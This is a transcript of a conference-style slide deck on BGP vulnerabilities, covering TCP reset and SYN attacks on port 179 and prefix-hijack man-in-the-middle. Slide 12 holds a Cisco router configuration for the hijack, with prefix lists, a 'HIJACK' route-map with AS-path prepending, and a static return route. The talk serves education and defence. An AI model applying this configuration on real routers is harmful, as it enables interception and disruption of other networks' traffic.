Top Banner
TIME TO SHUTDOWN INTERNET CORE ROUTER HTTP://IPSECS.COM
17
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: BGP Vulnerability

TIME TO SHUTDOWNINTERNET CORE ROUTER

HTTP://IPSECS.COM

Page 2: BGP Vulnerability

COMMUNICATION

Analog communication Digital communication Analog communication to

digital communication convergence

Internet Protocol

Page 3: BGP Vulnerability

FUTURE COMMUNICATION

IP based communication will become the core communication?

Scalability and reliability communication infrastructure?

Vulnerability and security threat?

Page 4: BGP Vulnerability

CORE COMMUNICATION

Access Control List? Default password issue? Weak password? Unencrypted remote login? Routing protocol vulnerability? We will focus on Border Gateway 

Protocol (BGP) now

Page 5: BGP Vulnerability

BGP VULNERABILITY

BGP messages TCP vulnerability BGP internet man in the

middle Documented on RFC 4272

Page 6: BGP Vulnerability

BGP MESSAGES

BGP states? idle, connect, active, opensent, openconfirm, established

BGP message? open, update, notification, keep alive

BGP message modification to poison routing table and Denial of Service

Complex and nearly impractical

Page 7: BGP Vulnerability
Page 8: BGP Vulnerability

TCP VULNERABILITY

BGP and TCP port 179 SPOOFED TCP RST/FIN? TCP port flooding (SYN) TCP session ends = BGP idle

Page 9: BGP Vulnerability
Page 10: BGP Vulnerability

BGP MAN IN THE MIDDLE More specific network prefix wins Use tracroute to identify routing

from source to destination Use route-map and AS-PATH

prepending Static routing to give information

about next-hop-router

Page 11: BGP Vulnerability
Page 12: BGP Vulnerability

router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remote­as 40neighbor 2.2.4.2 prefix­list JACKED outneighbor 2.2.4.2 route­map HIJACK outneighbor 4.3.2.1 remote­as 10neighbor 4.3.2.1 prefix­list ANN outneighbor 5.4.3.1 remote­as 60neighbor 5.4.3.1 prefix­list JACKED outneighbor 5.4.3.1 route­map HIJACK out!ip route 10.10.220.0 255.255.255.0 4.3.2.1!ip prefix­list ANN seq 10 permit 2.2.4.0/24ip prefix­list ANN seq 15 permit 4.3.2.0/24ip prefix­list ANN seq 20 permit 5.4.3.0/24!ip prefix­list JACKED seq 10 permit 2.2.4.0/24ip prefix­list JACKED seq 15 permit 4.3.2.0/24ip prefix­list JACKED seq 20 permit 5.4.3.0/24ip prefix­list JACKED seq 25 permit 10.10.220.0/24route­map HIJACK permit 10set as­path prepend 10 20 200

Page 13: BGP Vulnerability
Page 14: BGP Vulnerability

SOME POLICIES

Design and topology? Access Control List implementation? Complex password Encrypted connection (SSH & HTTPS)

Page 15: BGP Vulnerability

DEMO BGP ATTACK

Page 16: BGP Vulnerability

QUESTION? ANSWER

Page 17: BGP Vulnerability

THANK YOU


Related Documents
Securing the Border Gateway Protocol€¦ ·  · 2005-01-03Outline [BGP Overview [BGP Security [S-BGP Architecture [Deployment Issues for S-BGP [Alternative Approaches to BGP Security

Securing the Border Gateway Protocol€¦ ·  ·...

Category: Documents
Hands-on Advanced Networking Topics: BGP, BGP Hijacking ...

Hands-on Advanced Networking Topics: BGP, BGP Hijacking ...

Category: Documents
Introduction to BGP - SourceForgedslrouter.sourceforge.net/stuff/cisco/bgp-0.pdf · BGP neighbour status Router1>sh ip bgp sum BGP router identifier 100.1.15.224, local AS number

Introduction to BGP -...

Category: Documents
BGP for Internet Service Providers - deneb.iszt.hudeneb.iszt.hu/~kalmar/cisco/BGP-tutorial.pdf · BGP General Operation • Learns multiple paths via internal and external BGP speakers

BGP for Internet Service Providers -...

Category: Documents
Implementing BGP - cisco.com · Implementing BGP BorderGatewayProtocol(BGP)isanExteriorGatewayProtocol(EGP)thatallowsyoutocreateloop-free interdomainroutingbetweenautonomoussystems

Implementing BGP - cisco.com · Implementing BGP...

Category: Documents
BGP-TE APPLICATION LEVEL TOPOLOGY …...BGP Speaker BGP BGP Speaker Speaker IGP Router AS1 Prefix 1, 2, 3, … Prefix 11, 12, 13, … Prefix 21, 22, 23, … BGP Speaker Prefix 31,

BGP-TE APPLICATION LEVEL TOPOLOGY …...BGP Speaker BGP BGP....

Category: Documents
Implementing BGP - Cisco · Implementing BGP BorderGatewayProtocol(BGP)isanExteriorGatewayProtocol(EGP)thatallowsyoutocreateloop-free interdomainroutingbetweenautonomoussystems ...

Implementing BGP - Cisco · Implementing BGP...

Category: Documents
BGP Best Current Practicesftp.ines.ro/doc/isp-workshops/BGP Presentations/5-bgp-bcp.pdf · Cisco IOS Good Practices ! BGP in Cisco IOS is permissive by default ! Configuring BGP peering

BGP Best Current Practicesftp.ines.ro/doc/isp-workshops/BGP....

Category: Documents
BGP - CiscoBGP Name/CLIKeyword bgp FullName BorderGatewayProtocol BorderGatewayProtocol(BGP)isaprotocoldesignedtosharenetwork information(forexamplenetworkreachability ......

BGP - CiscoBGP Name/CLIKeyword bgp FullName...

Category: Documents
You’ve Got Vulnerability: Exploring Effective ... · You’ve Got Vulnerability: Exploring Effective Vulnerability Notifications ... pared to IPv4, including for BGP, DNS, FTP,

You’ve Got Vulnerability: Exploring Effective ... ·...

Category: Documents
Large BGP Communities - NOG · – Perceived as a micro optimization • Flexible BGP Communities (draft-lange-flexible-bgp-communities) – December 2002 – August 2010 – BGP

Large BGP Communities - NOG · – Perceived as a micro...

Category: Documents
BGP Vulnerability Testing: Separating Fact from FUD · BGP Vulnerability Testing: Separating Fact from FUD Sean Convery (sean@cisco.com) Matthew Franz (mfranz@cisco.com) Cisco Systems

BGP Vulnerability Testing: Separating Fact from FUD · BGP....

Category: Documents